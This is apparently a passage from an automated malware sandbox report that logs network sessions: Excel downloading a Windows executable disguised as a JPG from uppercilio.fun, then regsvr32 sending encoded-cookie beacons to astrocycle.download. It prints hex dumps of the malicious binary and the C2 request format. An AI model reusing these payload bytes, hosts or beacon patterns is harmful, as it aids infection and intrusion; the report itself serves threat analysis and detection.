                                                                                                                                                                                                          Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582051039 CEST73INData Raw: 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24 28 48
                                                                                                                                                                                                          Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ LL
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582067013 CEST74INData Raw: 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00 00 48
                                                                                                                                                                                                          Data Ascii: L$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582082987 CEST75INData Raw: 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24 88 00
                                                                                                                                                                                                          Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,H
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582098961 CEST77INData Raw: c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00 00 48
                                                                                                                                                                                                          Data Ascii: HD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$PH
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.582662106 CEST78INData Raw: 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00 00 00
                                                                                                                                                                                                          Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$$


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          2192.168.2.2249167172.67.146.8880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.746400118 CEST125OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                          Host: uppercilio.fun
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822695017 CEST127INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:20 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 57856
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                          Age: 6668
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=bnY7hfX1EQEu%2BmaCzYP0WSXCiAkbR%2BpsXJ0Ghx2e%2B6eyIicbwxoxD1SF7TGg5NolGfk0XEqm12ymQ5XePw1WcgdTgY2yGgPNEGWiqoJaw2L0qu41xuAu0QbSPMU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a948ced8672bb9-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822730064 CEST128INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: @@
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822751045 CEST129INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                          Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822772980 CEST131INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                          Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822793007 CEST132INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                          Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822813988 CEST134INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                          Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822833061 CEST135INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                          Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822858095 CEST136INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                          Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822881937 CEST138INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                          Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.822902918 CEST139INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                          Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.823575974 CEST141INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                          Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          3192.168.2.2249169104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.080490112 CEST446OUTGET / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __gads=3565085024:1:7248:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:33323243333445413842334431384630; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                          Host: astrocycle.download
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.623971939 CEST447INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:23 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=b8pfzzG0XJfzJuLuRBVzeOBEzZBFTUfWMFSlXvV4PJ6eZZ19VeeTkXwewjjyhC5yaPM359juJ4pqSeMTaolsHllOd1Jad91sl%2BrLgInH47n5AZnY27168xhsWtgKAvAehw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a948dd6874c2f4-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.624001980 CEST447INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          4192.168.2.2249171104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.207830906 CEST706OUTGET / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __gads=3565085024:1:7251:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:34323635383233383246444244423142; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                          Host: astrocycle.download
                                                                                                                                                                                                          Jul 6, 2021 15:47:27.038674116 CEST707INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:27 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=u9FU5e680D6%2FfoGsw0y3OCWvNq7S8aNdQw35%2BXzKBiGBt%2Bq6gIH6EC%2FQc6CHiJGVgeAt8cen3pkCrWUM3rDc5skK6ErY8uzKmssqJt5RsCYnMWx2IqMCXxnTryT3fPRbQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a948f0ff10c2c7-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                          Jul 6, 2021 15:47:27.038707972 CEST707INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          5192.168.2.2249173104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.043440104 CEST966OUTGET / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __gads=3565085024:1:7255:55; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=363438333531:416C627573:42393935434238304632383946363238; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                          Host: astrocycle.download
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.710551977 CEST967INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Tue, 06 Jul 2021 13:47:30 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4gHJJgQ0F0d1aLeKuiPmViBh61qCzRsanuvnEt26fvKCVutIpzBWEy%2F%2Fo80eo4ix1WVtNCu5ll9l7SvXabmskM%2FVgjjXEcYRud4nEtrTGMrUdvHRX1j8Vf7q2xeD5HxcWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 66a94908ff8d4a62-FRA
                                                                                                                                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.710656881 CEST967INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.647233963 CEST13.225.75.73443192.168.2.2249168CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                          CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                          CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                          CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                          Jul 6, 2021 15:47:25.059489012 CEST13.225.75.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                          CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                          CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
